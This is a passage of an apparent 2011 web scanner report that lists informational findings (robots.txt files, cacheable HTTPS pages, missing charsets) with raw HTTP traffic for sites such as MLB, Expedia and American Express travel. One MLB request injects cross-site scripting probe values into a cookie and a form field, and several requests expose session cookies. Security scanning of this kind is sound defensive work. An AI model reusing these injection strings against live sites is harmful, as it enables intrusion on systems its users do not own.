GET /robots.txt HTTP/1.0
Host: www.luminate.com

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 02:32:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Content-Type: text/plain
Cache-Control: s-maxage=86400, max-age=86400
Vary: Accept-Encoding
Age: 76819
Content-Length: 304
X-Cache: HIT from lb3-sv.int.pixazza.com
X-Cache-Lookup: HIT from lb3-sv.int.pixazza.com:80
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive


User-agent: *
Disallow: /activate/
Disallow: /ad-click/
Disallow: /ad-impression/
Disallow: /addwishlist/
Disallow: /ajax/
Disallow: /click/
Disallow: /deactivate/
Disallow: /hide/
Disallow: /show/

...[SNIP]...
25.42. http://www.manutd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manutd.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 57068
Cache-Control: private, max-age=481974
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close

Sitemap: http://www.manutd.com/sitemap.xml


User-agent: *
Disallow: /Live-Webchat/Endava-Test.aspx
Disallow: /Live-Webchat/Gemma-Test.aspx
Disallow: /Live-Webchat/Jens-Test.aspx
Disallow: /Liv
...[SNIP]...
25.43. http://www.premierleague.com/page/Home/0,,12306,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Home/0,,12306,00.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.premierleague.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/plain
Cache-Control: max-age=600
Date: Sun, 02 Oct 2011 23:48:53 GMT
Content-Length: 216
Connection: close

##
# Default robots.txt file which will be used for all sites that
# do not have their own specific robots.txt file.
#
# Please add robot exclusions below. e.g.
#
# User-agent: Mediapartners-Google*
#
...[SNIP]...
26. Cacheable HTTPS response  previous  next
There are 8 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

26.1. https://axptravel.americanexpress.com/consumertravel/customlogin.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://axptravel.americanexpress.com
Path:   /consumertravel/customlogin.do

Request

GET /consumertravel/customlogin.do?clientid=ACH-ONLINE&target=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do%3fService%3DAMEX%26leavingDate%3D10%2F04%2F11%26returningDate%3D10%2F07%2F11%26searchMode%3Dcity%26city%3DBoston%2C%2520United%2520States%26cityCountryCode%3D%26hotelName%3D%26adults%3D1%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25EF%25BF%25BDid%26WA4%3D%25EF%25BF%25BDid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot%26SSORequestPath%3D/hotel/HotelCobrand.do HTTP/1.1
Host: axptravel.americanexpress.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-1315530613634607

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:41 GMT
Server: IBM_HTTP_Server
Content-Length: 619
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


<html>
   <head>
       <meta http-equiv="Refresh" content="5; url=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do?Service=AMEX&amp;leavingDate=10/04/11&amp;returningDate=10/07/11&amp;
...[SNIP]...
26.2. https://go.americanexpress-travel.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...
26.3. https://secure.mlb.com/resetPassword.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...
26.4. https://www.expedia.com/static/default/default/stubs/adserver.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/stubs/adserver.json

Request

GET /static/default/default/stubs/adserver.json HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"51-1317085587388"
Last-Modified: Tue, 27 Sep 2011 01:06:27 GMT
Content-Length: 51
Date: Mon, 03 Oct 2011 01:08:47 GMT
Connection: keep-alive

{ url: 'http://www.tripadvisor.com/HotelLander' }
26.5. https://www.hotelplanner.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /

Request

GET / HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SCREENWIDTH=1920; SCREENHEIGHT=1200; SOURCECODE=Away; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 01:40:50 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Vary: Accept-Encoding
Content-Length: 0

26.6. https://www.hotelplanner.com/Accept/Reserve.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
26.7. https://www.hotelplanner.com/LastActive.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /LastActive.cfm

Request

GET /LastActive.cfm HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.hotelplanner.com/Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 0

26.8. https://www.hotelplanner.com/TT.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /TT.cfm

Request

GET /TT.cfm?Type=3&PageURL=https%3A%2F%2Fwww%2Ehotelplanner%2Ecom%2FAccept%2FReserve%2Ecfm%3Fsslsite%3DHOTELPLANNER%2ECOM%26locale%3Den%5FUS%26currency%3DUSD&Notes=&recache=C7359DF8-1372-5005-24DAD771D6D35804 HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.hotelplanner.com/Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SCREENWIDTH=1920; SCREENHEIGHT=1200; SOURCECODE=Away; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.4.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; TRAFFICID=15786488; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:44:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 0

27. HTML does not specify charset  previous  next
There are 83 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

27.1. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5282.161249.ADNETIK.COM/B5256632.283

Request

GET /adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 39912
Date: Mon, 03 Oct 2011 00:03:24 GMT

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...
27.2. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
